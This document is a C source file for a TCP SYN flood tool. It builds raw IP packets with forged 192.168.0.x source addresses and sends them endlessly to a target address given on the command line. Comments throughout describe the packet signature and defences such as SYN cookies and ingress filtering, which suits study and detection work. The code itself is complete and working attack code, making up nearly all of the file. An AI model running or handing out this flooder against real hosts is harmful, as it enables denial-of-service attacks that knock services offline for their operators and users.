

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <sys/time.h>

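/* TCP destination port written into every packet; 137 is the NetBIOS name service port number. */
#define DST_PORT	137
/*
 * Default destination, used only when no address is given on the command line.
 * 192.0.2.1 lies in TEST-NET-1 (RFC 5737, reserved for documentation), so a run
 * without arguments does not aim traffic at a routable third-party host.
 */
static char *dst_addr = "192.0.2.1";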


/*
 * TCP pseudo-header. send_frag_ip_pkt() places one of these in front of a copy
 * of the TCP segment and runs in_cksum() over both to obtain the TCP checksum;
 * the structure itself is never transmitted.
 */
struct pseudo_header
{
	unsigned long src_addr;		/* source address, copied from the IP header */
	unsigned long dst_addr;		/* destination address, copied from the IP header */
	unsigned char zero;		/* always written as 0 */
	unsigned char proto;		/* IP protocol number, copied from the IP header */
	unsigned short length;		/* TCP segment length, stored with htons() */
}__attribute__ ((packed));		/* packed: no padding between the members */

/* Opens the raw IPv4 socket with IP_HDRINCL set; exits the process on failure. */
int 	create_raw_socket(void);
/* Builds one TCP SYN packet and sends it on the given socket; returns the sendto() result. */
int 	send_frag_ip_pkt(int);
/* One's-complement checksum over a buffer; the int argument is a byte count. */
u_short in_cksum(u_short *, int);

/*
 * IP identification value for the next packet. It starts at 0x789 and is
 * incremented once per packet, so consecutive packets carry sequential IDs.
 */
static u_short ip_id = 0x789;

/*
 * Entry point: opens the raw socket, optionally replaces the default
 * destination with argv[1], then calls send_frag_ip_pkt() in an endless loop.
 *
 * argv[1], when present, is stored in dst_addr exactly as given; main() does
 * not validate it. Returns -1 after the first failed send. The loop has no
 * exit condition, so close(sock) and "return 0" below are never reached.
 *
 * For defenders: the only pacing is a one-second pause after every 1000
 * packets, so on the wire this appears as bursts of minimum-size SYN segments
 * towards a single address and port. Rate-based SYN alerting and SYN cookies
 * (both discussed in RFC 4987) are the usual controls for that pattern.
 */
int main(int argc, char *argv[])
{
	/* The socket is opened before the arguments are looked at. */
	int sock = create_raw_socket();
	int n = 0;	/* packets attempted so far; also drives the pause below */

	if(argc>=2) {
		dst_addr = argv[1];
	}

	/* Seeds rand(), which send_frag_ip_pkt() uses for the per-packet random fields. */
	srand(time(NULL));

	while(1) {

		/* One progress line is written to stdout for every packet. */
		printf("%d: Sending IP packet ... ", n++);
		fflush(stdout);
		if(send_frag_ip_pkt(sock)<0) {
			perror("sendto");
			return -1;
		}

		printf("done\n");

		/* Pause for one second after every 1000th packet. */
		if( (n%1000)==0 ) 
			sleep(1);

	}

	/* Unreachable: the loop above only leaves through "return -1". */
	close(sock);

	return 0;
}

/*
 * Open the raw IPv4 socket used for sending and switch on IP_HDRINCL, which
 * tells the kernel that the caller supplies the IP header itself.
 *
 * The socket is opened with IPPROTO_ICMP even though the header built by
 * send_frag_ip_pkt() sets the protocol field to TCP.
 *
 * Returns the socket descriptor. On any failure the error is reported with
 * perror() and the process exits with status 1, so callers never see an error
 * value.
 *
 * For defenders: on Linux, SOCK_RAW normally requires root or CAP_NET_RAW.
 * Keeping that capability away from ordinary accounts and containers, and
 * auditing which processes open raw sockets, limits where code like this can
 * run.
 */
int create_raw_socket(void)
{
	const int enable = 1;
	int fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

	if (fd < 0) {
		perror("socket");
		exit(1);
	}

	if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable)) < 0) {
		perror("setsockopt");
		exit(1);
	}

	return fd;
}

/*
 * Build one 44-byte IPv4 + TCP packet with only the SYN flag set and send it
 * on the raw socket sd to dst_addr. Despite the function name, frag_off is 0:
 * the packet is not fragmented.
 *
 * sd must be a raw socket with IP_HDRINCL enabled (see create_raw_socket()).
 * Returns whatever sendto() returns: the number of bytes sent, or -1 on error.
 *
 * For defenders, what each packet looks like as built here:
 *   - source address 192.168.0.1 to 192.168.0.253, picked with rand() per
 *     packet. These are RFC 1918 private addresses, so anti-spoofing filters
 *     at a network edge (BCP 38 / RFC 2827 ingress filtering, uRPF) drop them,
 *     and such sources arriving from the Internet can be treated as bogons.
 *   - source port 2000 to 2999, destination port DST_PORT.
 *   - TTL 255, window 8000, a single MSS option of 1460, no payload.
 *   - IP ID taken from a counter that increases by one per packet.
 *   - only a 16-bit random value is stored in the 32-bit sequence field.
 * Because the source is not the sender's own address, replies from the target
 * go elsewhere and the handshake is never completed; that is the half-open
 * connection load SYN cookies and backlog tuning (RFC 4987) are designed for.
 * The constant fields above make a stable signature for IDS or flow rules.
 */
int send_frag_ip_pkt(int sd)
{
	struct  sockaddr_in sin;
	unsigned char	buf[20 + 20 +4];	/* IP header + TCP header + 4-byte option = 44 bytes */
	unsigned char	chkbuf[512];		/* scratch: pseudo-header followed by a copy of the TCP segment */

	char	local_addr[32];			/* dotted-quad text of the forged source address */
	struct	iphdr	*iph;
	struct	tcphdr	*tcph;
	struct  pseudo_header *ph;
	u_short *port;				/* declared but not used in this function */
	int	i;
	
	/* Destination for sendto(); the port is left 0 on this raw socket. */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = inet_addr(dst_addr);
	sin.sin_port = 0;

	/* Forged source: last octet is 1 + (rand() % 253), i.e. 1..253. */
	sprintf(local_addr, "192.168.0.%u", 1 + ((unsigned)rand())%253 );

	memset(buf, 0, sizeof(buf));
	
	/* IPv4 header occupies buf[0..19]. */
	iph = (struct iphdr *)buf;
	iph->ihl	= 5;			/* 5 words = 20 bytes, no IP options */
	iph->version	= 4;
	iph->tos	= 0;
	iph->tot_len	= sizeof(buf);
	iph->id		= ip_id++;		/* sequential per packet */
	iph->frag_off	= 0;			/* no fragment offset, no flags */
	iph->ttl	= 255;
	iph->protocol	= IPPROTO_TCP;
	iph->check	= 0;			/* must be 0 while the checksum is computed */
	iph->saddr	= inet_addr(local_addr);
	iph->daddr	= inet_addr(dst_addr);
	
	/* Header checksum over the 20 header bytes, taken after all fields are set. */
	iph->check 	= in_cksum((u_short *)buf, 20);

	/* TCP header starts right after the IP header, at buf[20]. */
	tcph = (struct tcphdr *)&buf[20];

	tcph->source  = htons((u_short)(2000 + rand() % 1000));	/* 2000..2999 */
	tcph->dest    = htons(DST_PORT);
	tcph->seq     = (unsigned short)rand();	/* value truncated to 16 bits */
	tcph->ack_seq = 0;
	tcph->doff    = 6;			/* data offset: 6 words = 24 bytes, header plus the MSS option */
	tcph->syn     = 1;			/* SYN is the only flag set; the others stay 0 from memset */
	
	tcph->window  = htons(8000);
	tcph->check   = 0;			/* must be 0 while the checksum is computed */
	tcph->urg_ptr = 0;

	/* TCP option at buf[40..43]: kind = maximum segment size, length 4, value 1460. */
	buf[40] = TCPOPT_MAXSEG;
	buf[41] = 4;

	*(unsigned short *)(buf + 42) = htons(1460);
	
	/* sizeof(buf) is 44, so this loop body never runs: there is no payload to fill. */
	for(i=44; i<sizeof(buf); i++)
		buf[i] = rand();


	/*
	 * TCP checksum: pseudo-header at the start of chkbuf, then a copy of the
	 * 24-byte TCP segment, checksummed together.
	 */
	ph = (struct pseudo_header *)chkbuf;
	ph->src_addr = iph->saddr;
	ph->dst_addr = iph->daddr;
	ph->zero = 0;
	ph->proto = iph->protocol;
	ph->length = htons(sizeof(buf) - sizeof(*iph));
	memcpy(chkbuf + sizeof(*ph), &buf[sizeof(*iph)], sizeof(buf) - sizeof(*iph));

	tcph->check = in_cksum((u_short *)chkbuf, sizeof(buf) - sizeof(*iph) + sizeof(*ph));

	/* Hand the complete packet, IP header included, to the raw socket. */
	return sendto(sd, buf, sizeof(buf), 0,  
                      (struct sockaddr *)&sin, 
                      sizeof(sin));
}



/*
 * One's-complement checksum of the kind used in IP and TCP headers.
 *
 * addr: start of the data, read as 16-bit words in host byte order.
 * len:  number of bytes to cover; an odd final byte is included.
 *
 * Returns the complement of the folded 16-bit sum. A len of 0 yields 0xffff.
 * Nothing here checks the buffer: the caller must pass at least len readable
 * bytes, suitably aligned for 16-bit access.
 */
u_short in_cksum(u_short *addr, int len)
{
	u_short	*cursor = addr;
	u_short	tail = 0;
	int	total = 0;
	int	remaining;

	/* Add the buffer up one 16-bit word at a time. */
	for (remaining = len; remaining > 1; remaining -= 2)
		total += *cursor++;

	/* An odd trailing byte goes into the first byte of a zeroed word. */
	if (remaining == 1) {
		*(unsigned char *)&tail = *(unsigned char *)cursor;
		total += tail;
	}

	/* Fold the carries above bit 15 back into the low 16 bits, twice. */
	total = (total & 0xffff) + (total >> 16);
	total += total >> 16;

	return (u_short)~total;
}